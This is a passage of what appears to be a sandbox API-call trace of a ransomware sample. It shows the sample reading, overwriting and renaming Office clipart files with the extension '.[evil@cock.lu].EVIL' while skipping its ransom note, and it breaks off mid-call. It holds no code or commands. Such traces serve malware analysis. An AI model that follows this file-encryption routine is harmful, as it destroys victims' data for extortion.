[0110.666] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 0x45 [0110.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.668] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1044, lpOverlapped=0x0) returned 1 [0110.694] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.694] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.694] _errno () returned 0x84b1160840 [0110.694] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.694] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1060, lpOverlapped=0x0) returned 1 [0110.694] CloseHandle (hObject=0x1a8) returned 1 [0110.694] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.694] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.694] __uncaught_exception () returned 0x84b1160800 [0110.694] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.695] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf.[evil@cock.lu].evil")) returned 1 [0110.695] ??_V@YAXPEAX@Z () returned 0x1 [0110.698] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF", dwFileAttributes=0x200) returned 0 [0110.698] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.698] wcsstr (_Str="BL00296_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.698] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 69 [0110.698] wcscmp (_String1="BL00296_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.698] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00296_.WMF") returned 0x0 [0110.698] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 0x45 [0110.698] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.700] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x32c, lpOverlapped=0x0) returned 1 [0110.714] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.714] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.714] _errno () returned 0x84b1160840 [0110.714] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.714] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x340, lpOverlapped=0x0) returned 1 [0110.714] CloseHandle (hObject=0x1a8) returned 1 [0110.714] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.715] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.715] __uncaught_exception () returned 0x84b1160800 [0110.715] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.715] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf.[evil@cock.lu].evil")) returned 1 [0110.715] ??_V@YAXPEAX@Z () returned 0x1 [0110.718] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF", dwFileAttributes=0x200) returned 0 [0110.718] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.718] wcsstr (_Str="BL00390_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.718] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 69 [0110.718] wcscmp (_String1="BL00390_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.718] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00390_.WMF") returned 0x0 [0110.718] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 0x45 [0110.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.720] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x332e, lpOverlapped=0x0) returned 1 [0110.734] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.735] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.735] _errno () returned 0x84b1160840 [0110.735] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.735] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3340, lpOverlapped=0x0) returned 1 [0110.735] CloseHandle (hObject=0x1a8) returned 1 [0110.735] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.735] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.735] __uncaught_exception () returned 0x84b1160800 [0110.735] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.735] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf.[evil@cock.lu].evil")) returned 1 [0110.736] ??_V@YAXPEAX@Z () returned 0x1 [0110.738] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF", dwFileAttributes=0x200) returned 0 [0110.739] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.739] wcsstr (_Str="BL00392_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.739] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 69 [0110.739] wcscmp (_String1="BL00392_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.739] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00392_.WMF") returned 0x0 [0110.739] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 0x45 [0110.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.741] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x69aa, lpOverlapped=0x0) returned 1 [0111.057] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0111.057] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0111.057] _errno () returned 0x84b1160840 [0111.057] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.057] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x69c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x69c0, lpOverlapped=0x0) returned 1 [0111.057] CloseHandle (hObject=0x1a8) returned 1 [0111.057] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0111.057] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0111.058] __uncaught_exception () returned 0x84b1160800 [0111.058] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0111.058] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf.[evil@cock.lu].evil")) returned 1 [0111.058] ??_V@YAXPEAX@Z () returned 0x1 [0111.061] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF", dwFileAttributes=0x200) returned 0 [0111.061] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0111.061] wcsstr (_Str="BL00524_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0111.061] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 69 [0111.061] wcscmp (_String1="BL00524_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0111.061] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00524_.WMF") returned 0x0 [0111.061] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 0x45 [0111.061] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0111.063] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b54, lpOverlapped=0x0) returned 1 [0111.083] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0111.083] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0111.083] _errno () returned 0x84b1160840 [0111.083] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.083] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b60, lpOverlapped=0x0) returned 1 [0111.083] CloseHandle (hObject=0x1a8) returned 1 [0111.083] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0111.083] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0111.084] __uncaught_exception () returned 0x84b1160800 [0111.084] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0111.084] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf.[evil@cock.lu].evil")) returned 1 [0111.084] ??_V@YAXPEAX@Z () returned 0x1 [0111.087] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF", dwFileAttributes=0x200) returned 0 [0111.087] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0112.656] wcsstr (_Str="BL00525_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0112.656] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 69 [0112.656] wcscmp (_String1="BL00525_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0112.656] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00525_.WMF") returned 0x0 [0112.656] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 0x45 [0112.656] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0112.659] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2576, lpOverlapped=0x0) returned 1 [0113.009] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.009] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.009] _errno () returned 0x84b1160840 [0113.009] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.010] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2580, lpOverlapped=0x0) returned 1 [0113.010] CloseHandle (hObject=0x1a8) returned 1 [0113.010] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.010] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.010] __uncaught_exception () returned 0x84b1160800 [0113.010] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.010] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf.[evil@cock.lu].evil")) returned 1 [0113.011] ??_V@YAXPEAX@Z () returned 0x1 [0113.014] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF", dwFileAttributes=0x200) returned 0 [0113.014] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.014] wcsstr (_Str="BL00526_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.014] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 69 [0113.014] wcscmp (_String1="BL00526_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.014] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00526_.WMF") returned 0x0 [0113.014] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 0x45 [0113.014] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.016] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6ba0, lpOverlapped=0x0) returned 1 [0113.100] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.100] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.100] _errno () returned 0x84b1160840 [0113.100] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.100] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x6bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6bc0, lpOverlapped=0x0) returned 1 [0113.100] CloseHandle (hObject=0x1a8) returned 1 [0113.100] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.101] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.101] __uncaught_exception () returned 0x84b1160800 [0113.101] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.101] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf.[evil@cock.lu].evil")) returned 1 [0113.101] ??_V@YAXPEAX@Z () returned 0x1 [0113.104] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF", dwFileAttributes=0x200) returned 0 [0113.104] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.104] wcsstr (_Str="BL00648_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.104] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 69 [0113.104] wcscmp (_String1="BL00648_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.104] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00648_.WMF") returned 0x0 [0113.104] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 0x45 [0113.104] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.107] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2cec, lpOverlapped=0x0) returned 1 [0113.124] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.124] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.124] _errno () returned 0x84b1160840 [0113.124] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.124] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d00, lpOverlapped=0x0) returned 1 [0113.124] CloseHandle (hObject=0x1a8) returned 1 [0113.124] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.125] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.125] __uncaught_exception () returned 0x84b1160800 [0113.125] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.125] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf.[evil@cock.lu].evil")) returned 1 [0113.126] ??_V@YAXPEAX@Z () returned 0x1 [0113.129] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF", dwFileAttributes=0x200) returned 0 [0113.130] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.130] wcsstr (_Str="BL00921_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.130] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 69 [0113.130] wcscmp (_String1="BL00921_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.130] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00921_.WMF") returned 0x0 [0113.130] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 0x45 [0113.130] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 